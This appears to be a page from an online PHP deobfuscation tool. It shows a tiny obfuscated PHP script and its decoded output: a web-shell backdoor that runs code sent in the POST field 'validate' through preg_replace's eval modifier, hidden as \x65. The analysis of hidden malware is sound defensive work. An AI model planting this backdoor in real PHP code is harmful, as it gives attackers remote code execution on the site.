Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(isset($_POST["validate"])){ preg_replace("/./\x65",@$_POST["validate"],"."); } ?..
Decoded Output download
<?php
if(isset($_POST["validate"])){
preg_replace("/./e",@$_POST["validate"],".");
}
?>
Did this file decode correctly?
Original Code
<?php
if(isset($_POST["validate"])){
preg_replace("/./\x65",@$_POST["validate"],".");
}
?>
Function Calls
preg_replace | 1 |
Stats
MD5 | 297c2c4c246ae48b7564e60026ae2758 |
Eval Count | 1 |
Decode Time | 141 ms |